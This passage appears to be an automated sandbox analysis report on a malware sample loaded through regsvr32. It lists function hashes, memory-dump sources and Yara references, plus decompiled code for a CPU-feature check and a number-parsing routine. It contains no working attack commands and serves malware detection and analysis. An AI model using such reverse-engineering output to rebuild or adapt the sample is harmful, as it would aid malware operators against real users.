                                                                                                    • Opcode ID: 906ee5f9a5fc766950a60ef7b393832305cf627442d5dc6e6ebb8ceb1f8d46da
                                                                                                    • Instruction ID: dbb1a627a0e2621b4335964f18b4ef1da04e610c92f0cde8cc1e9e936c2d2118
                                                                                                    • Opcode Fuzzy Hash: 906ee5f9a5fc766950a60ef7b393832305cf627442d5dc6e6ebb8ceb1f8d46da
                                                                                                    • Instruction Fuzzy Hash: 7131D6B090470A8FDB48CF64C8865DE7FB1FB58358F104619EC4AA6290D378D6A4CFC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026115C0 Relevance: .1, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 84dd47b05222c47c6b19656f1c08df7bec723ad1be8593c36fec9128051f75e5
                                                                                                    • Instruction ID: 02e70bd51ed5864dec04bb78d5e6fe2cca0bea3cca69f8058dc79f64d426b468
                                                                                                    • Opcode Fuzzy Hash: 84dd47b05222c47c6b19656f1c08df7bec723ad1be8593c36fec9128051f75e5
                                                                                                    • Instruction Fuzzy Hash: 8B3192B090078E8FDB44CF64C88A5DE7BF0FB58758F010A19E869A6250D3B8D665CFD5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261FCD0 Relevance: .1, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d8d0d38d6d0c238a3f85bc36e608995ad612ae3d95f0456bb8732a08ceab6a89
                                                                                                    • Instruction ID: aa70abded38026e67233f5d862b7d9ea08b548563b8d0e936ef62ad0df116ea7
                                                                                                    • Opcode Fuzzy Hash: d8d0d38d6d0c238a3f85bc36e608995ad612ae3d95f0456bb8732a08ceab6a89
                                                                                                    • Instruction Fuzzy Hash: 2931A1B080478E8FDB44CF64D88A5CE7FB0FB54318F110A19F869A62A0D3B8D665CF95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02625A68 Relevance: .1, Instructions: 66COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5818948dfe362ec6f454ce2cb04b6158e89e51e80f3f700bd2f70ffeafa2a85f
                                                                                                    • Instruction ID: ea2f236726069427ff3724563a0da81534bd621e6ccc233d411da3c77c58bd65
                                                                                                    • Opcode Fuzzy Hash: 5818948dfe362ec6f454ce2cb04b6158e89e51e80f3f700bd2f70ffeafa2a85f
                                                                                                    • Instruction Fuzzy Hash: F031EA7090078E8FCB48DF64D88A5DE7BB0FB58348F014A19E866A6250D3B89665CFD5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00000001800455F0 Relevance: .0, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 86%
                                                                                                    			E000000011800455F0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0x8005f54c = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				_v16 = r9d;
				_v16 = 0;
				_v20 = __ebx;
				_v12 = __edx;
				if (0 != 0x18001000) goto 0x80045651;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0x8005f54c;
				r8d =  ==  ? r9d : r8d;
				 *0x8005f54c = r8d;
				 *0x8005f550 = r8d;
				return 0;
			}







                                                                                                    0x1800455f0
                                                                                                    0x1800455f6
                                                                                                    0x1800455fb
                                                                                                    0x180045602
                                                                                                    0x180045602
                                                                                                    0x180045609
                                                                                                    0x18004560b
                                                                                                    0x180045613
                                                                                                    0x180045619
                                                                                                    0x18004561d
                                                                                                    0x180045623
                                                                                                    0x180045627
                                                                                                    0x180045631
                                                                                                    0x18004563b
                                                                                                    0x180045646
                                                                                                    0x18004564a
                                                                                                    0x180045651
                                                                                                    0x18004565f

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c37a4612d472fb89b6eb7985f1311c52806e3d43902ba0f951884d653f10a0ca
                                                                                                    • Instruction ID: 7628b2f95d6a871ce2b6c640c21f3ed4532a1ac485971f10ce3e8d6b3d9ef2da
                                                                                                    • Opcode Fuzzy Hash: c37a4612d472fb89b6eb7985f1311c52806e3d43902ba0f951884d653f10a0ca
                                                                                                    • Instruction Fuzzy Hash: D0F0FF716146988ADBE59F29A8467697790E3483C4F90C119F689C3B14E63D85658F04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002F2C4 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 92ba57aabd8526d97c9267904ee952931a2221ca2caf64992ce54ec70e554aa7
                                                                                                    • Instruction ID: 2265c5f2d1e4b06b0ae6804bd43f109fcdf7af94b4f4d4cafb6af1261509bbc1
                                                                                                    • Opcode Fuzzy Hash: 92ba57aabd8526d97c9267904ee952931a2221ca2caf64992ce54ec70e554aa7
                                                                                                    • Instruction Fuzzy Hash: 15D0247A219E88CAC760CF16E48094A7B64F38CBD8B108106EA8E13B28CB38D550CB44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002F2F0 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 22434bcbdd0c15d3a310af4a58d2c09fa6d42be3ad9b7eb7d1768c90308f0f4f
                                                                                                    • Instruction ID: baa268f403d85f09c2081e0b761e2b996a1ea46622fe62ebf1ffb1059b3fa921
                                                                                                    • Opcode Fuzzy Hash: 22434bcbdd0c15d3a310af4a58d2c09fa6d42be3ad9b7eb7d1768c90308f0f4f
                                                                                                    • Instruction Fuzzy Hash: 95D0247A219E88CAD760CF16E48094A7B64F38CBD8B108106EA8E13B28CB38D550CB44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180002108 Relevance: .0, Instructions: 2COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dac1996d13add80b0dac5d1057263aa91964fe856fb9a72ff60a93e5c088029f
                                                                                                    • Instruction ID: 4950a3b2be34aa9e3c3ec010ba1e53932b745c5af244eba8e47044786c0238a6
                                                                                                    • Opcode Fuzzy Hash: dac1996d13add80b0dac5d1057263aa91964fe856fb9a72ff60a93e5c088029f
                                                                                                    • Instruction Fuzzy Hash: C6A00231148C0CD1F686CB00E8917D13330F36A384F41C052E209810709F38C619C349
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180049180 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 87windowregistryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$LoadWindow$StringTranslate$AcceleratorClassCreateCursorDispatchRegisterShowUpdate
                                                                                                    • String ID: P
                                                                                                    • API String ID: 396720107-3110715001
                                                                                                    • Opcode ID: 12b90440aa96ec986ece72a14c24d7f1ac9a6619aaa233f9da155dca3fbb7d55
                                                                                                    • Instruction ID: d892a3998db216d90ab137412fb549591f540799ab02152b9309e586aaf7583a
                                                                                                    • Opcode Fuzzy Hash: 12b90440aa96ec986ece72a14c24d7f1ac9a6619aaa233f9da155dca3fbb7d55
                                                                                                    • Instruction Fuzzy Hash: 31413232208F8992F7618F11F88479AB3A5F78DB85F558125FA8953B58DF3CC209CB44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180047140 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                                    • String ID:
                                                                                                    • API String ID: 1917832262-0
                                                                                                    • Opcode ID: d41a8d635a53c17fad78a485eeac21bc47966fd9b167db3c238dcb12570ee39a
                                                                                                    • Instruction ID: 02074647822ca568c8ba7c4af59993d013926652802ada9f52b7296ef81b8c95
                                                                                                    • Opcode Fuzzy Hash: d41a8d635a53c17fad78a485eeac21bc47966fd9b167db3c238dcb12570ee39a
                                                                                                    • Instruction Fuzzy Hash: 7081AF32B24F8489F3138B3594157E973A9AFAE7D8F018322BD0573B24EB3599878700
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002A964 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 492COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 75%
                                                                                                    			E0000000118002A964(signed short* __rax, long long __rbx, intOrPtr* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, intOrPtr _a16, long long _a24, long long _a32) {
				void* _v40;
				void* _v48;
				intOrPtr _v56;
				void* _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				void* _t133;
				void* _t165;
				void* _t189;
				void* _t192;
				signed short _t194;
				signed short _t195;
				signed short _t196;
				signed int _t197;
				signed int _t219;
				void* _t328;
				signed short* _t347;
				signed short* _t349;
				signed long long _t351;
				signed short* _t353;
				signed short* _t354;
				signed short* _t356;
				intOrPtr* _t357;
				long long _t365;
				long long* _t367;
				signed short* _t369;
				signed short* _t370;
				long long* _t373;
				long long* _t374;
				long long* _t378;
				long long* _t380;
				signed short** _t381;
				long long _t382;
				void* _t389;
				void* _t395;

				_t389 = __r8;
				_t382 = __rsi;
				_t365 = __rbx;
				_a8 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				r13d = 0;
				sil = r9b;
				r15d = r8d;
				_t381 = __rdx;
				if ( *__rdx != _t395) goto 0x8002a9ba;
				_t133 = E0000000118002E69C(__rax);
				 *__rax = 0x16;
				E0000000118002E4F0(_t133);
				_t367 =  *((intOrPtr*)(__rdx + 8));
				if (_t367 == 0) goto 0x8002a9b3;
				 *_t367 =  *__rdx;
				goto 0x8002b0fb;
				if (r8d == 0) goto 0x8002a9c8;
				if (__r8 - 2 - 0x22 > 0) goto 0x8002a994;
				_t378 = _t367;
				E00000001180018238( *__rdx, __rbx,  &_v80, _t378);
				_v48 =  *_t381;
				goto 0x8002a9fe;
				_t347 =  *_t381;
				_t194 =  *_t347 & 0x0000ffff;
				 *_t381 =  &(_t347[1]);
				if (E00000001180037C8C(_t194 & 0x0000ffff, 8, _t365,  &_v80) != 0) goto 0x8002a9f4;
				bpl = sil != 0;
				if (_t194 != 0x2d) goto 0x8002aa24;
				goto 0x8002aa2a;
				if (_t194 != 0x2b) goto 0x8002aa37;
				_t349 =  *_t381;
				_t195 =  *_t349 & 0x0000ffff;
				 *_t381 =  &(_t349[1]);
				_v84 = 0x66a;
				_a16 = 0xaf0;
				_v120 = 0xb66;
				_v160 = 0xb70;
				r11d = 0xff10;
				_v96 = 0xc66;
				_t14 = _t382 - 0x80; // 0x9e6
				r10d = _t14;
				_v152 = 0xc70;
				_v112 = 0xce6;
				r8d = 0x6f0;
				_v144 = 0xcf0;
				r9d = 0x966;
				_v88 = 0xd66;
				_v136 = 0xd70;
				_v104 = 0xe50;
				_v128 = 0xe5a;
				_v92 = 0xed0;
				_v168 = 0xeda;
				_v164 = 0xf20;
				_v156 = 0xf2a;
				_v148 = 0x1040;
				_v140 = 0x104a;
				_v132 = 0x17e0;
				_v124 = 0x17ea;
				_v116 = 0x1810;
				_v108 = 0x181a;
				_v100 = 0xff1a;
				if ((r15d & 0xffffffef) != 0) goto 0x8002adce;
				if (_t195 - 0x30 < 0) goto 0x8002acf4;
				if (_t195 - 0x3a >= 0) goto 0x8002ab42;
				goto 0x8002acef;
				if (_t195 - r11w >= 0) goto 0x8002acdd;
				if (_t195 - 0x660 < 0) goto 0x8002acf4;
				if (_t195 - _v84 >= 0) goto 0x8002ab66;
				goto 0x8002acef;
				if (_t195 - r8w < 0) goto 0x8002acf4;
				if (_t195 - 0x6fa >= 0) goto 0x8002ab85;
				goto 0x8002acef;
				if (_t195 - r9w < 0) goto 0x8002acf4;
				if (_t195 - 0x970 >= 0) goto 0x8002aba4;
				goto 0x8002acef;
				if (_t195 - r10w < 0) goto 0x8002acf4;
				if (_t195 - 0x9f0 >= 0) goto 0x8002abc3;
				goto 0x8002acef;
				if (_t195 - 0xa66 < 0) goto 0x8002acf4;
				if (_t195 - 0xa70 >= 0) goto 0x8002abe0;
				goto 0x8002acef;
				if (_t195 - (_t195 & 0x0000ffff) - 0xa66 < 0) goto 0x8002acf4;
				if (_t195 - _a16 >= 0) goto 0x8002ac00;
				goto 0x8002acef;
				if (_t195 - _v120 < 0) goto 0x8002acf4;
				if (_t195 - _v160 < 0) goto 0x8002ab5c;
				if (_t195 - _v96 < 0) goto 0x8002acf4;
				if (_t195 - _v152 < 0) goto 0x8002ab5c;
				if (_t195 - _v112 < 0) goto 0x8002acf4;
				if (_t195 - _v144 < 0) goto 0x8002ab5c;
				if (_t195 - _v88 < 0) goto 0x8002acf4;
				if (_t195 - _v136 < 0) goto 0x8002ab5c;
				if (_t195 - _v104 < 0) goto 0x8002acf4;
				if (_t195 - _v128 < 0) goto 0x8002ab5c;
				if (_t195 - _v92 < 0) goto 0x8002acf4;
				if (_t195 - _v168 < 0) goto 0x8002ab5c;
				if (_t195 - _v164 < 0) goto 0x8002acf4;
				if (_t195 - _v156 < 0) goto 0x8002ab5c;
				if (_t195 - _v148 < 0) goto 0x8002acf4;
				if (_t195 - _v140 < 0) goto 0x8002ab5c;
				if (_t195 - _v132 < 0) goto 0x8002acf4;
				if (_t195 - _v124 < 0) goto 0x8002ab5c;
				if (_t195 - _v116 < 0) goto 0x8002acf4;
				if (_t195 - _v108 >= 0) goto 0x8002acf4;
				goto 0x8002ab5c;
				if (_t195 - _v100 >= 0) goto 0x8002acec;
				goto 0x8002acef;
				if (((_t195 & 0x0000ffff) - r11d | 0xffffffff) != 0xffffffff) goto 0x8002ad1d;
				_t58 = _t365 - 0x41; // 0xfecf
				if (_t58 - 0x19 <= 0) goto 0x8002ad0b;
				_t59 = _t365 - 0x61; // 0xfeaf
				if (_t59 - 0x19 <= 0) goto 0x8002ad0b;
				goto 0x8002ad1d;
				_t60 = _t365 - 0x61; // 0xfeaf
				if (_t60 - 0x19 > 0) goto 0x8002ad1a;
				if ((_t195 & 0x0000ffff) - 0x20 + 0xffffffc9 == 0) goto 0x8002ad31;
				if (r15d != 0) goto 0x8002ad80;
				_t61 = _t382 + 2; // 0xa
				r15d = _t61;
				goto 0x8002ad80;
				_t351 =  *_t381;
				r8d = 0xffdf;
				_t219 =  *_t351 & 0x0000ffff;
				_t62 = _t351 + 2; // 0xffe1
				_t369 = _t62;
				 *_t381 = _t369;
				_t63 = _t378 - 0x58; // 0x608
				if ((r8w & _t63) == 0) goto 0x8002adb6;
				r15d =  ==  ? 8 : r15d;
				_t370 =  &(_t369[0xffffffffffffffff]);
				 *_t381 = _t370;
				if (_t219 == 0) goto 0x8002ad7b;
				if ( *_t370 == _t219) goto 0x8002ad7b;
				_t165 = E0000000118002E69C(_t351);
				 *_t351 = 0x16;
				E0000000118002E4F0(_t165);
				r11d = 0xff10;
				r13d = 0x660;
				r12d = 0x6f0;
				if (_t195 - 0x30 < 0) goto 0x8002af78;
				if (_t195 - 0x3a >= 0) goto 0x8002add5;
				r8d = _t195 & 0x0000ffff;
				r8d = r8d - 0x30;
				goto 0x8002af72;
				_t196 =  *_t370 & 0x0000ffff;
				r15d =  ==  ? 0x10 : r15d;
				_t70 =  &(_t370[1]); // 0xffe3
				_t353 = _t70;
				 *_t381 = _t353;
				goto 0x8002ad7b;
				goto 0x8002ad80;
				if (_t196 - r11w >= 0) goto 0x8002af5e;
				if (_t196 - r13w < 0) goto 0x8002af78;
				if (_t196 - 0x66a >= 0) goto 0x8002adff;
				r8d = _t196 & 0x0000ffff;
				r8d = r8d - r13d;
				goto 0x8002af72;
				if (_t196 - r12w < 0) goto 0x8002af78;
				if (_t196 - 0x6fa >= 0) goto 0x8002ae1f;
				r8d = _t196 & 0x0000ffff;
				r8d = r8d - r12d;
				goto 0x8002af72;
				if (_t196 - 0x966 < 0) goto 0x8002af78;
				_t71 =  &(_t353[5]); // 0x970
				r8d = _t71;
				if (_t196 - r8w >= 0) goto 0x8002ae43;
				r8d = _t196 & 0x0000ffff;
				r8d = r8d - 0x966;
				goto 0x8002af72;
				if (_t196 - 0x9e6 < 0) goto 0x8002af78;
				_t72 =  &(_t353[5]); // 0x9f0
				r8d = _t72;
				if (_t196 - r8w < 0) goto 0x8002ae37;
				_t73 = _t389 + 0x76; // 0xa66
				if (_t196 - _t73 < 0) goto 0x8002af78;
				_t74 =  &(_t353[5]); // 0xa70
				r8d = _t74;
				if (_t196 - r8w < 0) goto 0x8002ae37;
				_t75 = _t389 + 0x76; // 0xae6
				if (_t196 - _t75 < 0) goto 0x8002af78;
				if (_t196 - _a16 < 0) goto 0x8002ae37;
				if (_t196 - _v120 < 0) goto 0x8002af78;
				if (_t196 - _v160 < 0) goto 0x8002ae37;
				if (_t196 - _v96 < 0) goto 0x8002af78;
				if (_t196 - _v152 < 0) goto 0x8002ae37;
				if (_t196 - _v112 < 0) goto 0x8002af78;
				if (_t196 - _v144 < 0) goto 0x8002ae37;
				if (_t196 - _v88 < 0) goto 0x8002af78;
				if (_t196 - _v136 < 0) goto 0x8002ae37;
				if (_t196 - _v104 < 0) goto 0x8002af78;
				if (_t196 - _v128 < 0) goto 0x8002ae37;
				if (_t196 - _v92 < 0) goto 0x8002af78;
				if (_t196 - _v168 < 0) goto 0x8002ae37;
				if (_t196 - _v164 < 0) goto 0x8002af78;
				if (_t196 - _v156 < 0) goto 0x8002ae37;
				if (_t196 - _v148 < 0) goto 0x8002af78;
				if (_t196 - _v140 < 0) goto 0x8002ae37;
				if (_t196 - _v132 < 0) goto 0x8002af78;
				if (_t196 - _v124 < 0) goto 0x8002ae37;
				if (_t196 - _v116 < 0) goto 0x8002af78;
				if (_t196 - _v108 >= 0) goto 0x8002af78;
				goto 0x8002ae37;
				if (_t196 - _v100 >= 0) goto 0x8002af6e;
				r8d = _t196 & 0x0000ffff;
				r8d = r8d - r11d;
				goto 0x8002af72;
				r8d = r8d | 0xffffffff;
				if (r8d != 0xffffffff) goto 0x8002afa5;
				_t98 = _t365 - 0x41; // 0xfecf
				if (_t98 - 0x19 <= 0) goto 0x8002af90;
				_t99 = _t365 - 0x61; // 0xfeaf
				if (_t99 - 0x19 <= 0) goto 0x8002af90;
				r8d = r8d | 0xffffffff;
				goto 0x8002afa5;
				_t100 = _t365 - 0x61; // 0xfeaf
				r8d = _t196 & 0x0000ffff;
				if (_t100 - 0x19 > 0) goto 0x8002afa1;
				r8d = r8d - 0x20;
				r8d = r8d + 0xffffffc9;
				if (r8d == 0xffffffff) goto 0x8002afea;
				if (r8d - r15d >= 0) goto 0x8002afea;
				_t328 = _t395 - (_t351 | 0xffffffff);
				if (_t328 < 0) goto 0x8002afc6;
				if (_t328 != 0) goto 0x8002afc1;
				if (_t353 - _t378 <= 0) goto 0x8002afc6;
				goto 0x8002afd8;
				r14d = r8d;
				_t354 =  *_t381;
				_t197 =  *_t354 & 0x0000ffff;
				 *_t381 =  &(_t354[1]);
				goto 0x8002ad9b;
				 *_t381 =  &(( *_t381)[0xffffffffffffffff]);
				r13d = 0;
				_t356 =  *_t381;
				if (_t197 == 0) goto 0x8002b016;
				if ( *_t356 == _t197) goto 0x8002b016;
				_t189 = E0000000118002E69C(_t356);
				 *_t356 = 0x16;
				E0000000118002E4F0(_t189);
				if ((sil & bpl) != 0) goto 0x8002b03d;
				 *_t381 = _v48;
				if (_v56 == r13b) goto 0x8002a9a4;
				_t357 = _v80;
				 *(_t357 + 0x3a8) =  *(_t357 + 0x3a8) & 0xfffffffd;
				goto 0x8002a9a4;
				if (E00000001180029BE8(r13d | 0xe) == 0) goto 0x8002b0ca;
				_t192 = E0000000118002E69C(_t357);
				 *_t357 = 0x22;
				if ((bpl & 0x00000001) != 0) goto 0x8002b062;
				goto 0x8002b0d3;
				if ((bpl & 0x00000002) == 0) goto 0x8002b099;
				if (_v56 == r13b) goto 0x8002b07e;
				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
				_t373 = _t381[1];
				if (_t373 == 0) goto 0x8002b08d;
				 *_t373 =  *_t381;
				goto 0x8002b0fb;
				if (_v56 == r13b) goto 0x8002b0af;
				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
				_t374 = _t381[1];
				if (_t374 == 0) goto 0x8002b0be;
				 *_t374 =  *_t381;
				goto 0x8002b0fb;
				if ((bpl & 0x00000002) == 0) goto 0x8002b0d3;
				if (_v56 == r13b) goto 0x8002b0e9;
				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
				_t380 = _t381[1];
				if (_t380 == 0) goto 0x8002b0f8;
				 *_t380 =  *_t381;
				return _t192;
			}


























































                                                                                                    0x18002a964
                                                                                                    0x18002a964
                                                                                                    0x18002a964
                                                                                                    0x18002a964
                                                                                                    0x18002a969
                                                                                                    0x18002a96e
                                                                                                    0x18002a983
                                                                                                    0x18002a986
                                                                                                    0x18002a989
                                                                                                    0x18002a98c
                                                                                                    0x18002a992
                                                                                                    0x18002a994
                                                                                                    0x18002a999
                                                                                                    0x18002a99f
                                                                                                    0x18002a9a4
                                                                                                    0x18002a9ab
                                                                                                    0x18002a9b0
                                                                                                    0x18002a9b5
                                                                                                    0x18002a9bd
                                                                                                    0x18002a9c6
                                                                                                    0x18002a9c8
                                                                                                    0x18002a9d0
                                                                                                    0x18002a9db
                                                                                                    0x18002a9f2
                                                                                                    0x18002a9f4
                                                                                                    0x18002a9f7
                                                                                                    0x18002aa00
                                                                                                    0x18002aa0d
                                                                                                    0x18002aa15
                                                                                                    0x18002aa1d
                                                                                                    0x18002aa22
                                                                                                    0x18002aa28
                                                                                                    0x18002aa2a
                                                                                                    0x18002aa2d
                                                                                                    0x18002aa34
                                                                                                    0x18002aa37
                                                                                                    0x18002aa44
                                                                                                    0x18002aa54
                                                                                                    0x18002aa61
                                                                                                    0x18002aa69
                                                                                                    0x18002aa6f
                                                                                                    0x18002aa77
                                                                                                    0x18002aa77
                                                                                                    0x18002aa7b
                                                                                                    0x18002aa88
                                                                                                    0x18002aa90
                                                                                                    0x18002aa96
                                                                                                    0x18002aa9e
                                                                                                    0x18002aaa4
                                                                                                    0x18002aaac
                                                                                                    0x18002aab4
                                                                                                    0x18002aabc
                                                                                                    0x18002aac4
                                                                                                    0x18002aacc
                                                                                                    0x18002aad4
                                                                                                    0x18002aadc
                                                                                                    0x18002aae4
                                                                                                    0x18002aaec
                                                                                                    0x18002aaf4
                                                                                                    0x18002aafc
                                                                                                    0x18002ab04
                                                                                                    0x18002ab0c
                                                                                                    0x18002ab14
                                                                                                    0x18002ab23
                                                                                                    0x18002ab2c
